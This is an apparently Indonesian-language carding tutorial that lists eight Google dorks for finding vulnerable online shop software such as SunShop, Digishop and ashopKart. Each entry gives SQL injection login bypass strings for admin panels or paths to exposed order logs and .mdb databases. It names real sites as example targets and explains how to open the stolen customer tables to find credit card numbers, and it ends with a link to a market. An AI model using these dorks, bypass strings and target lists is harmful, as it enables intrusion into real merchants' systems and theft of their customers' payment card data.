1. google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca
contoh target buat kalian :
http://www.cashwells.com/cgi-bin/sto…ir_Manuals.htm
http://www.lilypadbulbs.com/cgi-bin/…Guarantees.htm
2. keword : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya : ‘or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin
kl target lainnya ga bs berarti dah di patch ma adminnya
3. Keyword : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces
4. keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS – Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??
5. keyword : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya : www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..
6. kita gunakan dari bugs webshop Sunshop
google dork : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’
contoh target buat kalian :
http://www.stopstaringclothing.com/sunshop/admin
7. Kita gunakan bugs dari webshop Digishop
Google dork : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin
8.google dork : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page – Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar bro… masih di table customer no 36 then klik payment
wanna see more http://market.addrs.info
